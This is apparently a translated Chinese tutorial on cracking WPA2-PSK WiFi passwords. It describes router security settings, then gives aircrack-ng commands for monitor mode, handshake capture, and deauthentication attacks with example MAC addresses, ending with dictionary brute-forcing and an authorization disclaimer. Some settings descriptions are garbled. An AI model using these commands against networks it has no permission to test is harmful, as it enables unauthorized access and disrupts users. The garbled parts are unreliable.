用最朴素的方法进行WiFi无线渗透
WPA/WPA2:WPA/WPA2 is an encryption algorithm that is stronger than WEP. By selecting this security type, the router will use a Radius server for authentication and obtain the key in the form of WPA or WPA2. Since setting up a dedicated authentication server is costly and complex, it is not recommended for different users to use this security type.
WPA-PSK/WPA2-PSK: WPA-PSK/WPA2-PSK is actually a simplified version of WPA/WPA2, based on the shared key WPA format. It has high security and relatively simple settings, suitable for home users and small businesses.
Detailed settings include:
Authentication Type: This option is used to select the security format used by the system, namely Enterprise, WPA-PSK, or WPA2-PSK.
Enterprise: If this option is selected, the router will automatically choose between WPA-PSK or WPA2-PSK security format based on the client's request.
Encryption Algorithm: This option is used to select the security algorithm for encrypting wireless data. The options include Enterprise, TKIP, and AES. The default option is Enterprise. If this option is selected, the router will automatically choose between TKIP or AES encryption method based on practical needs. Note that 11N mode does not support TKIP algorithm.
PSK Passphrase: This is the initial key for WPA-PSK/WPA2-PSK. During setup, it requires 8-63 ASCII characters or 8-64 hexadecimal characters.
Group Key Update Period: This setting determines the timing for updating broadcast and group key, in seconds. The minimum value is 30. If the value is set to 0, it means no update will be performed.
Using Aircrack-ng to capture WPA2-PSK handshake packets:
Main steps:
Set the wireless card to monitor mode:
airmon-ng start wlan0
Scan for nearby WPA2-PSK encrypted wireless signals:
airodump-ng wlan0mon
Open a new terminal and capture the handshake packets:
airodump-ng -c [num] -w wpa2 wlan0mon
(Specify the channel)During the waiting process, initiate a DeAuth attack to force the client to disconnect and reconnect, capturing the handshake packets:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon
(Set to initiate 5 attacks)
To continuously launch attacks, use this command: aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
Start the operation. I am using the TL-WN722N network card. Now, I need to connect the virtual machine to the network card. After successful connection, when I enter ifconfig
, I can see the information. Then, I enter airmon-ng start wlan0
to start monitoring.
During the process, CN represents the channel. Use the command airodump-ng -c channel --bssid xxx -w save_path wlan0mon
to scan and capture the target's handshake packets.
Parameters: --ivs -w FAN (save packets in IVS format, name it as "test"), --bssid (SSID of the AP to be cracked).
Force the client to disconnect: aireplay-ng -0 0 -a target_MAC -c target_client_MAC wlan0mon
For example: aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
Start the attack. Sometimes this command may give an error because the network card randomly uses channels. Try the same command multiple times until it succeeds.
If the handshake packet is captured successfully, it will be shown as in the figure.
Start cracking the password by executing the following command.
Finally, use a good dictionary for brute-forcing. After successful cracking, you will see the password. If the password is complex, it may take some time.
Disclaimer: The content shared on this public account is only for technical discussions among cybersecurity enthusiasts. It is prohibited to use it for illegal purposes. All penetration testing must be authorized. Otherwise, you will be responsible for the consequences. This public account and the original author do not bear any corresponding liability.